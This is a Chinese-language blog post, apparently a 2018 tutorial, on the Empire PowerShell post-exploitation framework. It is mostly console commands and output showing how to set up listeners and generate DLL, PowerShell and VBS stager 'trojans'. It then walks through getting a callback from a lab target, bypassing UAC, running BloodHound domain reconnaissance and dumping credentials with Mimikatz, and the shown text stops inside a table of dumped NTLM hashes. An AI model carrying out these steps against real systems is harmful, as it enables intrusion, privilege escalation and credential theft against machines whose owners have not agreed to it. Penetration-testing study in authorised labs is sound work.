<!DOCTYPE html>
<html lang="">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="mark">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="mark">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content>
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>Empire学习指南 · Marksec&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/favicon.ico">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/">Marksec&#39;s Blog.</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">Empire学习指南</a>
            </div>
    </div>
    
    <a class="home-link" href="/">Marksec's Blog.</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            Empire学习指南
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class="post-intro-tags">
    
        <a class="post-tag" href="javascript:void(0);" data-tags="内网渗透">内网渗透</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags="empire">empire</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags="powershell">powershell</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">2.2k</span>阅读时长: <span class="post-count reading-time">11 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/12/06</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <blockquote>
<p>empire是一款基于python编写的，使用powershell进行后渗透的工具，它类似于metasploit的渗透测试框架，empire可以实现无需powershell.exe即可运行PowerShell 代理的功能，从键盘记录器到Mimikatz 等快速部署的后期开发模块，以及适应性通信以避开网络检测，所有这些都包含在以可用性为重点的框架中。目前empire的版本号为empire2.5</p>
</blockquote>
<h2 id="安装启动"><a href="#安装启动" class="headerlink" title="安装启动"></a>安装启动</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/EmpireProject/Empire.git    </span><br><span class="line">cd Empire/</span><br><span class="line">cd setup/</span><br><span class="line">./install.sh </span><br><span class="line">./empire</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h2 id="模块简介"><a href="#模块简介" class="headerlink" title="模块简介"></a>模块简介</h2><p>empire主要的只要功能模块为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">(Empire) &gt; help</span><br><span class="line"></span><br><span class="line">Commands</span><br><span class="line">========</span><br><span class="line">agents            Jump to the Agents menu.                           回连靶机</span><br><span class="line">creds             Add/display credentials to/from the database.      数据库中写入的各类凭据（主要为口令一类）</span><br><span class="line">exit              Exit Empire</span><br><span class="line">help              Displays the help menu.</span><br><span class="line">interact          Interact with a particular agent.                  与现有agents进行交互</span><br><span class="line">list              Lists active agents or listeners.                  列出当前活跃的监听器或服务端</span><br><span class="line">listeners         Interact with active listeners.                    进入监听器设置接口</span><br><span class="line">load              Loads Empire modules from a non-standard folder.   加载自定义模块或其他扩展模块接口（默认为empire当前目录）</span><br><span class="line">plugin            Load a plugin file to extend Empire.               加载自定义插件或其他扩展插件</span><br><span class="line">plugins           List all available and active plugins.             列出所有载入的插件列表</span><br><span class="line">preobfuscate      Preobfuscate PowerShell module_source files        预混淆功能</span><br><span class="line">reload            Reload one (or all) Empire modules.                同MSFreload功能</span><br><span class="line">report            Produce report CSV and log files: sessions.csv, credentials.csv, master.log    输出报告</span><br><span class="line">reset             Reset a global option (e.g. IP whitelists).        重置ip黑白名单、混淆项目等</span><br><span class="line">resource          Read and execute a list of Empire commands from a file.  批量导入empire命令执行</span><br><span class="line">searchmodule      Search Empire module names/descriptions.           模块关键词搜索</span><br><span class="line">set               Set a global option (e.g. IP whitelists).          设置ip黑白名单、混淆项目等</span><br><span class="line">show              Show a global option (e.g. IP whitelists).         查看当前框架设置，也就是set默认值</span><br><span class="line">usemodule         Use an Empire module.                              使用某一模块</span><br><span class="line">usestager         Use an Empire stager.                              使用某一载荷</span><br></pre></td></tr></table></figure>
<h2 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">创建listener</span><br><span class="line">启用listener</span><br><span class="line">使用launcher启动一个powershell</span><br><span class="line">在目标靶机上执行代码</span><br><span class="line">与代理交互</span><br><span class="line">执行多种模块</span><br><span class="line">绕过UAC来获取admin权限</span><br></pre></td></tr></table></figure>
<p>首先输入listener进入listener交互模式，然后输入uselistener+空格再按tab键就可以使用你想生成的连接方式，然后再进行监听的基本设置就可以完成了。当我们想删除直接使用kill+Name就可以了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">(Empire) &gt; listeners</span><br><span class="line">(Empire: listeners) &gt; uselistener </span><br><span class="line">dbx           http_com      http_hop      meterpreter   redirector</span><br><span class="line">http          http_foreign  http_mapi     onedrive </span><br><span class="line">(Empire: listeners) &gt; uselistener http   //设置为http</span><br><span class="line">(Empire: listeners/http) &gt; info          //查看设置详情</span><br><span class="line">(Empire: listeners/http) &gt; set Name test //设置名字 </span><br><span class="line">(Empire: listeners/http) &gt; execute       //启动</span><br><span class="line">(Empire: listeners/http) &gt; back          //返回</span><br><span class="line">(Empire: listeners) &gt; list               //列出当前的监听列表</span><br><span class="line"></span><br><span class="line">[*] Active listeners:</span><br><span class="line"></span><br><span class="line">  Name              Module          Host                                 Delay/Jitter   KillDate</span><br><span class="line">  ----              ------          ----                                 ------------   --------</span><br><span class="line">  test              http            http://192.168.199.124:80            5/0.0</span><br></pre></td></tr></table></figure>
<p>接着我们进行木马的制作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line">(Empire: listeners) &gt; usestager //列出可选择模块</span><br><span class="line">multi/bash                multi/war                 osx/dylib                 osx/macro                 windows/backdoorLnkMacro  windows/ducky             windows/launcher_sct      windows/macroless_msword</span><br><span class="line">multi/launcher            osx/applescript           osx/jar                   osx/pkg                   windows/bunny             windows/hta               windows/launcher_vbs      windows/shellcode</span><br><span class="line">multi/macro               osx/application           osx/launcher              osx/safari_launcher       windows/csharp_exe        windows/launcher_bat      windows/launcher_xml      windows/teensy</span><br><span class="line">multi/pyinstaller         osx/ducky                 osx/macho                 osx/teensy                windows/dll               windows/launcher_lnk      windows/macro </span><br><span class="line"></span><br><span class="line">dll木马：</span><br><span class="line">(Empire: listeners) &gt; usestager windows/dll</span><br><span class="line">(Empire: stager/windows/dll) &gt; info</span><br><span class="line"></span><br><span class="line">Name: DLL Launcher</span><br><span class="line"></span><br><span class="line">Description:</span><br><span class="line">  Generate a PowerPick Reflective DLL to inject with</span><br><span class="line">  stager code.</span><br><span class="line"></span><br><span class="line">Options:</span><br><span class="line"></span><br><span class="line">  Name             Required    Value             Description</span><br><span class="line">  ----             --------    -------           -----------</span><br><span class="line">  Listener         True                          Listener to use.</span><br><span class="line">  ProxyCreds       False       default           Proxy credentials</span><br><span class="line">                                                 ([domain\]username:password) to use for</span><br><span class="line">                                                 request (default, none, or other).</span><br><span class="line">  Obfuscate        False       False             Switch. Obfuscate the launcher</span><br><span class="line">                                                 powershell code, uses the</span><br><span class="line">                                                 ObfuscateCommand for obfuscation types.</span><br><span class="line">                                                 For powershell only.</span><br><span class="line">  Proxy            False       default           Proxy to use for request (default, none,</span><br><span class="line">                                                 or other).</span><br><span class="line">  Language         True        powershell        Language of the stager to generate.</span><br><span class="line">  OutFile          True        /tmp/launcher.dll File to output dll to.</span><br><span class="line">  UserAgent        False       default           User-agent string to use for the staging</span><br><span class="line">                                                 request (default, none, or other).</span><br><span class="line">  Arch             True        x64               Architecture of the .dll to generate</span><br><span class="line">                                                 (x64 or x86).</span><br><span class="line">  ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.</span><br><span class="line">                                                 Only used if Obfuscate switch is True.</span><br><span class="line">                                                 For powershell only.</span><br><span class="line">  StagerRetries    False       0                 Times for the stager to retry</span><br><span class="line">                                                 connecting.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">(Empire: stager/windows/dll) &gt; set Listener test</span><br><span class="line">(Empire: stager/windows/dll) &gt; execute</span><br><span class="line"></span><br><span class="line">[*] Stager output written out to: /tmp/launcher.dll</span><br><span class="line"></span><br><span class="line">powershell木马：</span><br><span class="line">(Empire: listeners) &gt; launcher powershell test //powershell只需launcher powershell+name即可</span><br><span class="line"></span><br><span class="line">launcher_vbs木马：</span><br><span class="line">(Empire: listeners) &gt; usestager windows/launcher_vbs</span><br><span class="line">(Empire: stager/windows/launcher_vbs) &gt; info</span><br><span class="line"></span><br><span class="line">Name: VBS Launcher</span><br><span class="line"></span><br><span class="line">Description:</span><br><span class="line">  Generates a .vbs launcher for Empire.</span><br><span class="line"></span><br><span class="line">Options:</span><br><span class="line"></span><br><span class="line">  Name             Required    Value             Description</span><br><span class="line">  ----             --------    -------           -----------</span><br><span class="line">  Listener         True                          Listener to generate stager for.</span><br><span class="line">  OutFile          False       /tmp/launcher.vbs File to output .vbs launcher to,</span><br><span class="line">                                                 otherwise displayed on the screen.</span><br><span class="line">  Obfuscate        False       False             Switch. Obfuscate the launcher</span><br><span class="line">                                                 powershell code, uses the</span><br><span class="line">                                                 ObfuscateCommand for obfuscation types.</span><br><span class="line">                                                 For powershell only.</span><br><span class="line">  ObfuscateCommand False       Token\All\1,Launcher\PS\12467The Invoke-Obfuscation command to use.</span><br><span class="line">                                                 Only used if Obfuscate switch is True.</span><br><span class="line">                                                 For powershell only.</span><br><span class="line">  Language         True        powershell        Language of the stager to generate.</span><br><span class="line">  ProxyCreds       False       default           Proxy credentials</span><br><span class="line">                                                 ([domain\]username:password) to use for</span><br><span class="line">                                                 request (default, none, or other).</span><br><span class="line">  UserAgent        False       default           User-agent string to use for the staging</span><br><span class="line">                                                 request (default, none, or other).</span><br><span class="line">  Proxy            False       default           Proxy to use for request (default, none,</span><br><span class="line">                                                 or other).</span><br><span class="line">  StagerRetries    False       0                 Times for the stager to retry</span><br><span class="line">                                                 connecting.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">(Empire: stager/windows/launcher_vbs) &gt; set Listener test</span><br><span class="line">(Empire: stager/windows/launcher_vbs) &gt; execute</span><br><span class="line"></span><br><span class="line">[*] Stager output written out to: /tmp/launcher.vbs</span><br></pre></td></tr></table></figure>
<p>我们暂时使用powershell木马进行连接实验然后进行后续模块学习，通过在目标机器上粘贴我们的powershell木马进行回连。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">(Empire: agents) &gt; agents  //列表列出当前回连的链路</span><br><span class="line"></span><br><span class="line">[*] Active agents:</span><br><span class="line"></span><br><span class="line"> Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen</span><br><span class="line"> ----     -- -----------     ------------      --------                -------            ---    -----    ---------</span><br><span class="line"> A2B7YFVG ps 192.168.199.122 WIN-6S1ISV98BNM   *TEST\Administrator     powershell         3064   5/0.0    2018-11-04 03:09:33</span><br><span class="line"> (Empire: agents) &gt; interact A2B7YFVG //连接进行该目标机进行操作，进入后可以help进行命令了解</span><br><span class="line"> (Empire: A2B7YFVG) &gt; help    //可以进行mimikatz，bypassuac等等</span><br><span class="line"></span><br><span class="line">Agent Commands</span><br><span class="line">==============</span><br><span class="line">agents            Jump to the agents menu.</span><br><span class="line">back              Go back a menu.</span><br><span class="line">bypassuac         Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn &lt;listener&gt;</span><br><span class="line">clear             Clear out agent tasking.</span><br><span class="line">creds             Display/return credentials from the database.</span><br><span class="line">download          Task an agent to download a file.</span><br><span class="line">exit              Task agent to exit.</span><br><span class="line">help              Displays the help menu or syntax for particular commands.</span><br><span class="line">info              Display information about this agent</span><br><span class="line">injectshellcode   Inject listener shellcode into a remote process. Ex. injectshellcode &lt;meter_listener&gt; &lt;pid&gt;</span><br><span class="line">jobs              Return jobs or kill a running job.</span><br><span class="line">kill              Task an agent to kill a particular process name or ID.</span><br><span class="line">killdate          Get or set an agent&apos;s killdate (01/01/2016).</span><br><span class="line">list              Lists all active agents (or listeners).</span><br><span class="line">listeners         Jump to the listeners menu.</span><br><span class="line">lostlimit         Task an agent to change the limit on lost agent detection</span><br><span class="line">main              Go back to the main menu.</span><br><span class="line">mimikatz          Runs Invoke-Mimikatz on the client.</span><br><span class="line">psinject          Inject a launcher into a remote process. Ex. psinject &lt;listener&gt; &lt;pid/process_name&gt;</span><br><span class="line">pth               Executes PTH for a CredID through Mimikatz.</span><br><span class="line">rename            Rename the agent.</span><br><span class="line">resource          Read and execute a list of Empire commands from a file.</span><br><span class="line">revtoself         Uses credentials/tokens to revert token privileges.</span><br><span class="line">sc                Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]</span><br><span class="line">scriptcmd         Execute a function in the currently imported PowerShell script.</span><br><span class="line">scriptimport      Imports a PowerShell script and keeps it in memory in the agent.</span><br><span class="line">searchmodule      Search Empire module names/descriptions.</span><br><span class="line">shell             Task an agent to use a shell command.</span><br><span class="line">shinject          Inject non-meterpreter listener shellcode into a remote process. Ex. shinject &lt;listener&gt; &lt;pid&gt;</span><br><span class="line">sleep             Task an agent to &apos;sleep interval [jitter]&apos;</span><br><span class="line">spawn             Spawns a new Empire agent for the given listener name. Ex. spawn &lt;listener&gt;</span><br><span class="line">steal_token       Uses credentials/tokens to impersonate a token for a given process ID.</span><br><span class="line">sysinfo           Task an agent to get system information.</span><br><span class="line">updatecomms       Dynamically update the agent comms to another listener</span><br><span class="line">updateprofile     Update an agent connection profile.</span><br><span class="line">upload            Task an agent to upload a file.</span><br><span class="line">usemodule         Use an Empire PowerShell module.</span><br><span class="line">workinghours      Get or set an agent&apos;s working hours (9:00-17:00).</span><br></pre></td></tr></table></figure>
<h2 id="模块学习"><a href="#模块学习" class="headerlink" title="模块学习"></a>模块学习</h2><h3 id="检查UAC提权方法模块"><a href="#检查UAC提权方法模块" class="headerlink" title="检查UAC提权方法模块"></a>检查UAC提权方法模块</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">(Empire: agents) &gt; interact V92TNFDK //进入目标机</span><br><span class="line">(Empire: V92TNFDK) &gt; usemodule （空格+tab键） //查看usemodule的模块，注意需要在进入到代理主机才能使用该模块,UAC提权需要是管理员组的用户才行</span><br><span class="line">(Empire: V92TNFDK) &gt; usemodule privesc/powerup/allchecks //检查提权方法模块</span><br><span class="line">(Empire: V92TNFDK) &gt; execute //执行检查</span><br></pre></td></tr></table></figure>
<h3 id="UAC提权模块"><a href="#UAC提权模块" class="headerlink" title="UAC提权模块"></a>UAC提权模块</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(Empire: V92TNFDK) &gt; bypassuac test //执行uac提权,back之后看到带有*的用户的name,表示代理已提权过</span><br></pre></td></tr></table></figure>
<h3 id="域环境信息收集模块"><a href="#域环境信息收集模块" class="headerlink" title="域环境信息收集模块"></a>域环境信息收集模块</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(Empire: V92TNFDK) &gt; usemodule situational_awareness/network/bloodhound //bloodhound是一个域环境收集的工具，在学习empire的时候看见它的后渗透模块也集成了该工具，以后详细介绍该工具</span><br></pre></td></tr></table></figure>
<h3 id="mimikatz模块"><a href="#mimikatz模块" class="headerlink" title="mimikatz模块"></a>mimikatz模块</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">(Empire: V92TNFDK) &gt; mimikatz  //对于后渗透工具，hash dump的工具也是必不可少的</span><br><span class="line">(Empire: V92TNFDK) &gt; creds     //列举密码 同时通过pth 也可以进行下一步令牌窃取</span><br><span class="line"></span><br><span class="line">Credentials:</span><br><span class="line"></span><br><span class="line">  CredID  CredType   Domain                   UserName         Host             Password</span><br><span class="line">  ------  --------   ------                   --------         ----             --------</span><br><span class="line">  1       hash       test.com                 Administrator    WIN-6S1ISV98BNM  e19ccf75ee54e06b06a5907af13cef42</span><br><span class="line">  2       hash       test.com                 WIN-6S1ISV98BNM$ 